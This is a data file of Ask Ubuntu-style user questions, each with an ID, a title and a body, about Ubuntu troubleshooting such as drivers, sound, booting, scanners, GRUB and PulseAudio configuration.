473796	deleting expired ip-addresses	i am testing ubuntu 12.10 dhcp server , it 's working fine , but i need to delete all ip-addresses which have been give from the dhcp-pool , as i would like to start fresh before i clone the server to another hd . any suggestions ? many thanks madona33
473798	addition of a second keyb layout on ubuntu 12.04 through cli	i have an ubuntu12.04 desktop installation in which i can add a second keyboard layout ( i.e . german ) with the mouse going through system tools > system settings > keyboard layout > layout . from there i can add german and i can see the icon appearing on the bar which allows me to change between the 2 layouts . also in the next tab of keyboard layout is system in which you can copy system wide your current settings . i am trying to do this from cli since i want to incorporate this with puppet and i dont have much success . i have tried dpkg-reconfigure console-setup but this is not adding a second language but changes to what you select . i have tried adding the language-pack-de and language-gnome-pack-de . i have also tried to modify the file under /etc/default/keyboard and added de in there and then run udenadm trigger -- subsystem-match=input -- action=changestill no success . the only think that kind of works is setxkbmap de which changes the layout on terminal but still i do n't have the icon appearing on the desktop and it is not convenient since the users of this machine are using desktop and change frequentlly the layout so going to a shell to change the keyboard is not efficient . could someone please help me out . thank you in advance for you time costas
473799	upgrading a n130 xp netbook	i have to replace xp on my aged samsung n130 netbook , so would like to install ubuntu/kubuntu , and continue to use xp in a virtual machine . the netbook has 1 gb ram but only one slot , so to upgrade to 2 mb would mean discarding the existing card . it has 160 gb . any suggestions on suitable set-up and partitioning would be welcome , as well as any other tips . the machine is currently used with firefox ( or chrome ) sea monkey ( or thunderbird ) and a tv browser , liked with my desktop machine ( windows 7 ) via wlan .
473802	how to fix no sound problem after startx in alsa sound driver	my development env is : os : ubuntu 12.04.3 language : qt 4.8.1 alsamixer ver : v1.0.25 i am using .xinitrc contents like this : alsactl restore rm -rf /tmp/ . * clear while ( true ) do ~ = > the path of application which will be executed done in qt source code , the sound volume is changed like this : strcomm_temp= '' amixer set \'master\ ' 100 % ,100 % on '' ; system ( strcomm_temp.tolocal8bit ( ) ) ; strcomm_temp= '' amixer set \'front\ ' 100 % ,100 % on '' ; system ( strcomm_temp.tolocal8bit ( ) ) ; in qt source code , play the sound file : qsound : :play ( `` ... toggled.wav '' ) ; however , but in the application i did not hear any sound . i tried to install alsa-oss and addded the line in .xinitrc file like this while ( true ) do aoss ~ = > the path of application which will be executed done but , it is still the same , i do not hear any sound . how do i fix this problem ?
473803	i have 4 bad sectors on my hard disk , should i be worried ?	i use ubuntu 14.04 lts . here are some screenshots that depict the condition of my hard drive . it shows that my hard drive has 4 bad sectors . is this something to worry about ? is there any way to solve this problem ?
473805	panasonic scanner invalid argument	hello i 've installed panasonic kx-mb2030tk drivers from manufacturer 's website.it worked well when i tested it . but after a couple of days , when i try to scan now it fails with invalid argument error . the scanner is on network . scanimage -l device `panamfs:10.6.53.210 ' is a panasonic kx-mb2030tk sheetfed scanner simple-scan -d simple-scan -d [ +0,00s ] debug : simple-scan.vala:579 : starting simple scan 3.10.2 , pid=3092 [ +0,00s ] debug : connecting to session manager [ +0,02s ] warning : g_object_set_valist : invalid object type 'gtkadjustment ' for value type 'gtkwidget' [ +0,03s ] debug : ui.vala:1524 : restoring window to 600x400 pixels [ +0,03s ] debug : ui.vala:1529 : restoring window to maximized [ +0,03s ] debug : autosave-manager.vala:64 : loading autosave information [ +0,03s ] debug : autosave-manager.vala:258 : waiting to autosave ... [ +0,03s ] warning : autosave-manager.vala:76 : could not load autosave infomation ; not restoring any autosaves [ +0,06s ] debug : scanner.vala:1443 : sane_init ( ) - > sane_status_good [ +0,06s ] debug : scanner.vala:1449 : sane version 1.0.23 [ +0,06s ] debug : scanner.vala:1510 : requesting redetection of scan devices [ +0,06s ] debug : scanner.vala:802 : processing request [ +0,13s ] debug : autosave-manager.vala:280 : autosaving book information [ +2,16s ] debug : simple-scan.vala:307 : requesting scan at 150 dpi from device ' ( null ) ' [ +2,16s ] debug : scanner.vala:1556 : scanner.scan ( `` ( null ) '' , dpi=150 , scan_mode=scanmode.gray , depth=2 , type=scantype.single , paper_width=0 , paper_height=0 , brightness=0 , contrast=0 ) [ +6,80s ] debug : scanner.vala:338 : sane_get_devices ( ) - > sane_status_good [ +6,80s ] debug : scanner.vala:350 : device : name= '' panamfs:10.6.53.210 '' vendor= '' panasonic '' model= '' kx-mb2030tk '' type= '' sheetfed scanner '' [ +6,80s ] debug : scanner.vala:802 : processing request [ +6,80s ] debug : scanner.vala:863 : sane_open ( `` panamfs:10.6.53.210 '' ) - > sane_status_good [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 0 ) [ +6,80s ] debug : scanner.vala:734 : option 0 : title='number of options ' type=int size=4 cap= , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : read-only option that specifies how many options a specific devices supports . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 1 ) [ +6,80s ] debug : scanner.vala:734 : option 1 : name='preview ' title='preview ' type=bool size=4 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : request a preview-quality scan . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 2 ) [ +6,80s ] debug : scanner.vala:734 : option 2 : name= ' ( null ) ' title='scan mode ' type=group size=0 [ +6,80s ] debug : scanner.vala:737 : description : [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 3 ) [ +6,80s ] debug : scanner.vala:734 : option 3 : name='mode ' title='scan mode ' type=string size=16 values= [ `` black and white '' , `` grayscale '' , `` color '' ] cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : `` black and white '' is for documents containing only text or line art . `` grayscale '' is for documents containing photographs . `` color '' is for document containing color image . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 4 ) [ +6,80s ] debug : scanner.vala:734 : option 4 : name='resolution ' title='scan resolution ' type=int size=9 unit=dpi values= [ 75 , 100 , 150 , 200 , 300 , 400 , 600 , 1200 ] cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : select a resolution of your document . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 5 ) [ +6,80s ] debug : scanner.vala:734 : option 5 : name='duplex ' title='duplex ' type=string size=19 values= [ `` none '' , `` flip on long edge '' , `` flip on short edge '' ] cap= , inactive [ +6,80s ] debug : scanner.vala:737 : description : `` none '' : scan one side of your document . `` flip on long edge '' : scan both sides if your document layout is long edge . `` flip on short edge '' : scan both sides if your document layout is short edge . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 6 ) [ +6,80s ] debug : scanner.vala:734 : option 6 : name= ' ( null ) ' title='geometry ' type=group size=0 [ +6,80s ] debug : scanner.vala:737 : description : [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 7 ) [ +6,80s ] debug : scanner.vala:734 : option 7 : name='paper-size ' title='scan size ' type=string size=12 values= [ `` a4 '' , `` letter '' , `` legal '' , `` b5 ( iso ) '' , `` b5 ( jis ) '' , `` 16k '' , `` 8.5 '' x13 '' '' , `` 8.5 '' x13.4 '' '' , `` user define '' ] cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : select a scan size that corresponds to the size of your original document . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 8 ) [ +6,80s ] debug : scanner.vala:734 : option 8 : name='tl-x ' title='top-left x ' type=fixed size=4 unit=mm min=0,000000 , max=215,899994 , quant=0 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : top-left x position of scan area . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 9 ) [ +6,80s ] debug : scanner.vala:734 : option 9 : name='tl-y ' title='top-left y ' type=fixed size=4 unit=mm min=0,000000 , max=355,599991 , quant=0 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : top-left y position of scan area . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 10 ) [ +6,80s ] debug : scanner.vala:734 : option 10 : name='br-x ' title='bottom-right x ' type=fixed size=4 unit=mm min=0,000000 , max=215,899994 , quant=0 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : bottom-right x position of scan area . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 11 ) [ +6,80s ] debug : scanner.vala:734 : option 11 : name='br-y ' title='bottom-right y ' type=fixed size=4 unit=mm min=0,000000 , max=355,599991 , quant=0 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : bottom-right y position of scan area . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 12 ) [ +6,80s ] debug : scanner.vala:734 : option 12 : name= ' ( null ) ' title='enhancement ' type=group size=0 cap= , advanced [ +6,80s ] debug : scanner.vala:737 : description : [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 13 ) [ +6,80s ] debug : scanner.vala:734 : option 13 : name='brightness ' title='brightness ' type=int size=4 min=1 , max=5 , quant=1 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : the balance of light and dark colors in an image . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 14 ) [ +6,80s ] debug : scanner.vala:734 : option 14 : name='contrast ' title='contrast ' type=int size=4 min=1 , max=5 , quant=1 cap= , soft-select , soft-detect [ +6,80s ] debug : scanner.vala:737 : description : the relative difference between the dark and light portions of an image . [ +6,80s ] debug : scanner.vala:884 : sane_get_option_descriptor ( 15 ) [ +6,80s ] debug : scanner.vala:895 : scan_source not available , trying alternative `` doc-source '' [ +6,80s ] debug : scanner.vala:546 : sane_control_option ( 3 , sane_action_set_value , `` grayscale '' ) - > ( sane_status_good , `` grayscale '' ) [ +6,80s ] debug : scanner.vala:462 : sane_control_option ( 4 , sane_action_set_value , 150 ) - > ( sane_status_good , 150 ) [ +6,80s ] debug : scanner.vala:530 : sane_control_option ( 10 , sane_action_set_value , option.range.max ) - > ( sane_status_good ) [ +6,80s ] debug : scanner.vala:530 : sane_control_option ( 11 , sane_action_set_value , option.range.max ) - > ( sane_status_good ) [ +6,81s ] debug : scanner.vala:1209 : sane_start ( page=0 , pass=0 ) - > sane_status_inval [ +6,81s ] warning : scanner.vala:1216 : unable to start device : invalid argument [ +6,81s ] debug : scanner.vala:764 : sane_cancel ( ) [ +6,81s ] debug : scanner.vala:767 : sane_close ( )
473806	how to activate graphics card ?	i use ubuntu 12.10 . i use this driver : i run : sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ lspci|grep vga 02:00.0 vga compatible controller : nvidia corporation gf114 [ geforce gtx 560 ] ( rev a1 ) sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ and : sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ glxinfo |grep open xlib : extension `` nv-glx '' missing on display `` :0.0 '' . opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 0x301 ) opengl version string : 1.4 ( 2.1 mesa 9.0.3 ) opengl extensions : sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ the detail of graphics card in my system : sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ sudo nvidia-smi -a [ sudo ] password for sam : ==============nvsmi log============== timestamp : thu may 29 15:20:55 2014 driver version : 304.88 attached gpus : 1 gpu 0000:02:00.0 product name : geforce gtx 560 display mode : n/a persistence mode : disabled driver model current : n/a pending : n/a serial number : n/a gpu uuid : gpu-e1f0b8bb-6c27-6617-59ed-4aac7498c08b vbios version : 70.24.21.00.00 inforom version image version : n/a oem object : n/a ecc object : n/a power management object : n/a gpu operation mode current : n/a pending : n/a pci bus : 0x02 device : 0x00 domain : 0x0000 device id : 0x120110de bus id : 0000:02:00.0 sub system id : 0x83b41043 gpu link info pcie generation max : n/a current : n/a link width max : n/a current : n/a fan speed : 29 % performance state : n/a clocks throttle reasons : n/a memory usage total : 1023 mb used : 3 mb free : 1020 mb compute mode : default utilization gpu : n/a memory : n/a ecc mode current : n/a pending : n/a ecc errors volatile single bit device memory : n/a register file : n/a l1 cache : n/a l2 cache : n/a texture memory : n/a total : n/a double bit device memory : n/a register file : n/a l1 cache : n/a l2 cache : n/a texture memory : n/a total : n/a aggregate single bit device memory : n/a register file : n/a l1 cache : n/a l2 cache : n/a texture memory : n/a total : n/a double bit device memory : n/a register file : n/a l1 cache : n/a l2 cache : n/a texture memory : n/a total : n/a temperature gpu : 40 c power readings power management : n/a power draw : n/a power limit : n/a default power limit : n/a min power limit : n/a max power limit : n/a clocks graphics : n/a sm : n/a memory : n/a applications clocks graphics : n/a memory : n/a max clocks graphics : n/a sm : n/a memory : n/a compute processes : n/a sam @ sam : /opt/ros/morse/share/morse/examples/tutorials $ i 'm not understand why geforce gtx 560 is not running ? how to activate geforce gtx 560 ? thank you~
473808	how to create a script which opens the browser and logins to a particular gmail account ?	i have created a bash script login.sh . i want it to open the browser and login to my gmail account . i tried using the following command to open the browser with www.gmail.com . xdg-open http : //gmail.com it opens gmail home page perfectly . but i do n't know how to pass the username and password for login to gmail from the bash script . is it possible to open the browser and login to gmail from a script ?
473809	how to copy file and paste its path in vim in normal and insert mode ?	ubuntu has this feature that copy a file and pasting it into a text field pastes its path in the text field . good . but how to do to that in vim ( launched using vim -g after installing vim-gtk ) both in insert ( for opening the file : e /file/path ) and normal mode ? i tried : e ctrl-r * but pasted text that i had copied earlier somewhere else . i tried it on emacs ctrl-y and in the address bar of firefox ctrl-v , it worked as expected .
473815	how to update driver or anything to correctly detect new devices on new platform ?	i 've got a board which , in ubuntu 12.04.2 server , have plenty of problems , and it works well in ubuntu 14.04 server . was it because that the board is newer than 12.04.2 ? here are the lspci and lsusb or both 12.04.2 and 14.04 12.04.2 lspci 00:00.0 host bridge : intel corporation device 0f00 ( rev 0e ) 00:02.0 vga compatible controller : intel corporation device 0f31 ( rev 0e ) 00:13.0 sata controller : intel corporation device 0f23 ( rev 0e ) 00:14.0 usb controller : intel corporation device 0f35 ( rev 0e ) 00:1a.0 encryption controller : intel corporation device 0f18 ( rev 0e ) 00:1b.0 audio device : intel corporation device 0f04 ( rev 0e ) 00:1c.0 pci bridge : intel corporation device 0f48 ( rev 0e ) 00:1c.1 pci bridge : intel corporation device 0f4a ( rev 0e ) 00:1c.2 pci bridge : intel corporation device 0f4c ( rev 0e ) 00:1c.3 pci bridge : intel corporation device 0f4e ( rev 0e ) 00:1f.0 isa bridge : intel corporation device 0f1c ( rev 0e ) 00:1f.3 smbus : intel corporation device 0f12 ( rev 0e ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0c ) 14.04 lspci 00:00.0 host bridge : intel corporation valleyview ssa-cunit ( rev 0e ) 00:02.0 vga compatible controller : intel corporation valleyview gen7 ( rev 0e ) 00:13.0 sata controller : intel corporation valleyview 6-port sata ahci controller ( rev 0e ) 00:14.0 usb controller : intel corporation valleyview usb xhci host controller ( rev 0e ) 00:1a.0 encryption controller : intel corporation valleyview sec ( rev 0e ) 00:1b.0 audio device : intel corporation valleyview high definition audio controller ( rev 0e ) 00:1c.0 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1c.1 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1c.2 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1c.3 pci bridge : intel corporation valleyview pci express root port ( rev 0e ) 00:1f.0 isa bridge : intel corporation valleyview power control unit ( rev 0e ) 00:1f.3 smbus : intel corporation valleyview smbus controller ( rev 0e ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0c ) 12.04.2 lsmod module size used by coretemp 13362 0 kvm_intel 127736 0 snd_hda_codec_realtek 64876 1 kvm 365556 1 kvm_intel snd_hda_intel 33029 3 snd_hda_codec 116477 2 snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13277 1 snd_hda_codec snd_pcm 81124 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13133 0 snd_rawmidi 25426 1 snd_seq_midi snd_seq_midi_event 14476 1 snd_seq_midi xt_hl 12466 0 ip6t_rt 12474 0 snd_seq 51594 2 snd_seq_midi , snd_seq_midi_event nf_conntrack_ipv6 13750 0 nf_defrag_ipv6 13176 1 nf_conntrack_ipv6 ipt_reject 12513 0 xt_log 17238 0 xt_multiport 12534 0 xt_limit 12542 0 xt_tcpudp 12532 0 xt_addrtype 12597 0 dm_multipath 22755 0 xt_state 12515 0 scsi_dh 14205 1 dm_multipath microcode 18396 0 ip6table_filter 12712 1 ip6_tables 22382 2 ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12586 0 nf_conntrack_broadcast 12542 1 nf_conntrack_netbios_ns nf_nat_ftp 12596 0 snd_timer 28932 2 snd_pcm , snd_seq nf_nat 24741 1 nf_nat_ftp nf_conntrack_ipv4 14123 2 nf_nat nf_defrag_ipv4 12650 1 nf_conntrack_ipv4 nf_conntrack_ftp 13184 1 nf_nat_ftp nf_conntrack 66862 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12707 1 snd_seq_device 14138 3 snd_seq_midi , snd_rawmidi , snd_seq ip_tables 18107 1 iptable_filter x_tables 22012 13 xt_hl , ip6t_rt , ipt_reject , xt_log , xt_multiport , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables serio_raw 13032 0 snd 62675 15 snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device nfsd 214706 2 soundcore 14636 1 snd snd_page_alloc 14109 2 snd_hda_intel , snd_pcm nfs 267817 0 lockd 66069 2 nfsd , nfs fscache 50643 1 nfs auth_rpcgss 35602 2 nfsd , nfs nfs_acl 12772 2 nfsd , nfs sunrpc 199304 6 nfsd , nfs , lockd , auth_rpcgss , nfs_acl joydev 17394 0 mac_hid 13078 0 lp 17456 0 parport 40931 1 lp dm_raid45 76509 0 xor 26091 1 dm_raid45 dm_mirror 21862 0 dm_region_hash 16101 1 dm_mirror dm_log 18194 3 dm_raid45 , dm_mirror , dm_region_hash btrfs 749989 0 zlib_deflate 26623 1 btrfs libcrc32c 12544 1 btrfs hid_generic 12485 0 uas 17745 0 r8169 56853 0 usbhid 46054 0 hid 82511 2 hid_generic , usbhid video 19070 0 zram 18244 1 14.04 lsmod module size used by snd_hda_codec_hdmi 45303 1 snd_hda_codec_realtek 51029 1 intel_rapl 18301 0 coretemp 13195 0 kvm_intel 132549 0 kvm 388083 1 kvm_intel crc32_pclmul 12967 0 snd_hda_intel 42730 0 snd_hda_codec 164067 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13272 1 snd_hda_codec snd_pcm 85501 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 14230 2 snd_pcm , snd_hda_intel serio_raw 13230 0 snd_timer 28584 1 snd_pcm snd 60871 7 snd_hda_codec_realtek , snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_pcm , snd_hda_codec , snd_hda_intel soundcore 12600 1 snd joydev 17101 0 i915 705396 2 drm_kms_helper 46907 1 i915 drm 243792 3 i915 , drm_kms_helper video 18903 1 i915 i2c_algo_bit 13197 1 i915 mac_hid 13037 0 lp 13299 0 parport 40836 1 lp hid_generic 12492 0 usbhid 47035 0 hid 87604 2 hid_generic , usbhid usb_storage 48417 0 r8169 61562 0 mii 13654 1 r8169 ahci 25579 2 libahci 26754 1 ahci
473817	how to remove ubuntu installed on windows partition	i thought i had done the partition properly but when i installed it ubuntu was loaded on window partition now i 'm trying to reset and start again i 'm running windows xp
473821	fan running constantly after installing ubuntu [ dell inspiron 5520 ]	i installed ubuntu 13.10 on my dell inspiron 5520 and this is my first experience with ubuntu or any os other than windows.. the system starts up normally and functions although it seemsto be slower than win 8.1 ( thats not much of an issue though ) but once the fan starts running it wont stop untill i shut down the laptop . this is the only major issue i have with ubuntu
473822	ubuntu installation done ; but unable to start any program	i just installed ubuntu on my pc . i completely removed xp . the installation seems to be ok . i have the ubuntu start monitor but when i move the mouse onto a program item i canâ´t start any program by doubleclicking it . there is no reaction at all . i donâ´t understand where the problem is . guido yes , none of the icons respond to a left click or double click .
473824	add-apt-repository and update and install package	i find add-apt-repository very userful and use it quite often . i was wondering why it does n't provide an option to do the add + update + install package in one command . i was planning to make a script for this , but ask for your advice first . did someone already make that ? something like sudo add-apt-repository ppa : address -install package that works like the 3 commands but in one line . would it be useful ?
473827	grub issue and botrepair wo n't work	i 'm having some issues with my freshly installed ubuntu.. it seems grub did n't install properly ( i installed `` alongside windows '' in uefi ) . i tried to run bootrepair but it kinda stuck in a loop asking me `` filesystem repair requires to unmount partitions . please close all your programs . then close this window. '' . i 've seen other people experiencing similar problems but as i understand there are several possible causes to it so i decided to be cautious and ask for the help of the community ... please ? here is my magic link : http : //paste.ubuntu.com/7542427/ you are my only hope ... ; )
473828	uninstalling ubuntu and installing windows	recently built a computer and installed ubuntu 14.04 from usb . i struggle with using the interface , programs and terminal so i plan to put windows 7 ultimate iso onto a usb while in ubuntu . then remove ubuntu and install windows 7 . how do i go about doing this and what programs do i use ? i have attempted to burn an iso file to a usb but it seems to corrupt itself , the usb might be the wrong file type for holding a windows 7 iso . i have attempted to do this before and i lost all of my files only for windows 7 to not install and so i came here to hopefully get some help . since a moderator has closed the question that is unlikely .
473830	boot problem in samsung	i have formatted my laptop completely and installed ubuntu 14.4 after installation ubuntu is not booting directly i have to put the pen drive ( which has ubuntu 14.4 live cd ) every time on start up and press f4 which is for recovery after booting if take the pen drive then no problem its working normally my laptop is samsung np370 with intel i5 3rd gen processor with 6gb ram and 1tb hard disk please help me
473832	doubleclick ubuntu gnome 14.04	just installed ubuntu gnome 14.04 , everything 's working fine except one thing : when i want to close or minimize an application windows , i have to click twice before it works . it 's very annoying ! any ideas ? sorry for my bad englisch btw ; ) . thanks !
473837	lost disk after migrating from xp to ubuntu	after migrating from windows xp ( they still exist ; ) i `` lost '' the disk with 3 partitions on it . one of these partitions was the windows system disk . this disk is now marked as `` unallocated '' . how do i get access to this disk again ? thnx for helping out ...
473838	upgrade to 14.04lte ?	how can i upgrade current version of ubuntu 13.10 to ubuntu 14.04 ? and how do i make sure that my data on the disk is also intact ?
473839	how can i delete private information in a bug report ?	if i report a bug to launchpad using ubuntu-bug it usually adds a bunch of files about my system to the bug , it also adds a automatic generated bug summary to my bug report text . both the summary and the attached files may potentially contain private imformation such as my user name , host name etc . i did n't find any option to edit the summary or the files . i just know how to delete the attachement . so , how can i delete or change the private information in the summary and attached files ?
473840	how to enable multiple lan connection in ubuntu virtual	i like to use squid proxy server inside ubuntu to share my internet but when i power on ubuntu its only one lan eth0 is showing instead of two , how to make both lan available i have installed ubuntu 12.04 inside windows server 2008 using vmware workstation 8 , and i configured to use 2 processor core and network option i tried both bridge and nat ,
473842	black command screen after logout	when i log out of my account in ubuntu , there is a black command screen where there are different commands with [ ok ] written after them and the last command is `` stopping v run level compatibility '' and nothing after that.i have to manually shut down my computer after that , any reason for that ?
473843	how to turn a pdf into a text searchable pdf ?	i have a number of scanned documents in pdf and i want to be able to search them . how can i do that ? essentially i have to ocr the pdf and then blend the extracted text back into a new pdf . i have unsuccesfully tried a number of different solutions ( including the ones found in adding ocr info to a pdf ) . pdfocr ( which gives me this issue : https : //github.com/gkovacs/pdfocr/issues/7 ) pdfsandwich ( of which the software center says it is a poor package and i should not install it ) ocrfeeder ( in the software center ) exports to odt nicely , but does not react when exporting to pdf . gscan2pdf exports an all black ( but searchable ) image as reported in this discussion . i do n't think pdfxchange viewer can handle doing ocr on the fly on files over 500 pages . is there a software package i am unaware of ? or a script that does this ?
473844	ubuntu 14.10 no gui or term login	i have updated yesterday my ubuntu 14.10 installation with apt-get dist-upgrade . i was working all afternoon and after that i have rebooted computer . once done it , lightdm does n't starts ( only gnome logo ) and i can not view any of ctrl + shift + [ 1-6 ] terminals ( cursor is blinking ) . i have read a lot of posts with no success : nividia/intel conflicts ( i have a laptop with an intel graphic card ) i have enabled nomodeset and tried all this options my computer boots to a black screen , what options do i have to fix it ? i have repaired grub i can load recovery/livecd/windows and mount partitions and network without problem i have all packages and system updated here my logs . x11 not shows any error or problem , is loading all needed drivers without problem . how can i raise the level of debug ? [ solved ] i ca n't add a solution ( low reputation ) , then i post here how to fix : 1 ) in grub menu , go to advanced options for ubuntu and then to recovery mode on last kernel 2 ) select root option 3 ) mount filesystem as rw : mount -o remount , rw /dev/sdax / when x is your root partition 4 ) edit file /etc/default/grub with this line : grub_cmdline_linux_default= '' quiet init=/lib/systemd/systemd '' 5 ) update grub with : update-grub2 6 ) reboot and enjoy : ) more info here http : //ubuntuforums.org/showthread.php ? t=2226708
473845	remove packages by using preseed file pxe ubuntu 12.04 installation	i am using this syntax in my preseed file to remove libreoffice package from installation : d-i preseed/early_command apt-get remove libreoffice ; it returns code error 127 upon booting the client . i tried it with a sudo to give a root privilege but i am still facing the same problem .
473848	ubuntu 14.04 realtek semiconductor co. , ltd. rts5227 pci express card reader is n't working	i 've read some other posts issuing this problem . but without an solution for exactly this problem . i 've installed ubuntu 14.04 on my lenovo t440s . realtek semiconductor co. , ltd. rts5227 pci express card reader is n't working on it . after i pushed a sd card into the slot , nothing happened . # lspci 02:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5227 pci express card reader ( rev 01 ) subsystem : lenovo device 220c flags : fast devsel , irq 16 memory at f0500000 ( 32-bit , non-prefetchable ) [ size=4k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number 00-00-00-01-00-4c-e0-00 capabilities : [ 150 ] latency tolerance reporting capabilities : [ 158 ] l1 pm substates # lshw *-pci:0 beschreibung : pci bridge produkt : lynx point-lp pci express root port 6 hersteller : intel corporation physische id : 1c bus-informationen : pci @ 0000:00:1c.0 version : e4 breite : 32 bits takt : 33mhz f채higkeiten : pci pciexpress msi pm normal_decode bus_master cap_list konfiguration : driver=pcieport ressourcen : irq:17 memory : f0500000-f05fffff *-generic ungefordert beschreibung : unassigned class produkt : rts5227 pci express card reader hersteller : realtek semiconductor co. , ltd. physische id : 0 bus-informationen : pci @ 0000:02:00.0 version : 01 breite : 32 bits takt : 33mhz f채higkeiten : pm msi pciexpress cap_list konfiguration : latency=0 ressourcen : memory : f0500000-f0500fff greetz
473849	how to re-read pulseaudio client configuration without rebooting ?	i use to modify from time to time the configuration of /etc/pulseaudio/client.conf for commmenting or not that option : default-server = 192.168.0.10 that server is another ubuntu and is connected to a hi-fi sound system . pulse audio is configured on it to receive streams . why do i use this ? i know that we can use the sound applet to choose the output , including a remote pulse audio server , but it does n't work well neither with flash or vlc ( the sound is chopped ) . so the only reliable way is to configure the pulseaudio client to use directly the remote pulseaudio server without using my local pulseaudio as a proxy . my question : after enabling or disabling the option default-server , the only way to make it applied i found is rebooting the computer ... i also tried : killing/starting the local pulseaudio with : pulseaudio -k ; pulseaudio -d restarting the pulseaudio service : /etc/init.d/pulseaudio restart both close the unity session and reopen it none of this is working except rebooting . is someone have an idea to apply it without rebooting ?
473850	ubuntu 14.04 lost cores on amd cpu	it seems that i have a problem . installed 14.04 a few days ago , everything was smooth sailing until yesterday it would n't boot up . recovery mode says that cpu 's 1-6 do n't respond . after 7 it moves forward but then reboots . a live system from a usb stick boots up , just , and shows only one cpu present in /sys/devices/system/cpu . what makes this really interesting is that all the while windows 7 installed alongside seems to work just fine with all cores . any help , suggestions and ideas would be appreciated , thank you . output of /proc/cpuinfo : processor : 0 vendor_id : authenticamd cpu family : 21 model : 2 model name : amd fx ( tm ) -8320 eight-core processor stepping : 0 microcode : 0x600081c cpu mhz : 1400.000 cache size : 2048 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 16 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7023.26 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro and lshw http : //pastebin.com/x1w3psu6
473855	software & updates : server changes automatically to `` custom servers ''	i set `` server for india '' in software & updates as following : but it randomly ( after some days ) & automatically sets to `` custom servers '' as following : how to stop changing this ? because this download all source ( repositories updates ) from beginning while reload or sudo apt-get update .
473856	plugins for browser ?	are there any plugins or extensions ( free or proprietary ) for the new browser that i can add to make it work more efficiently ?
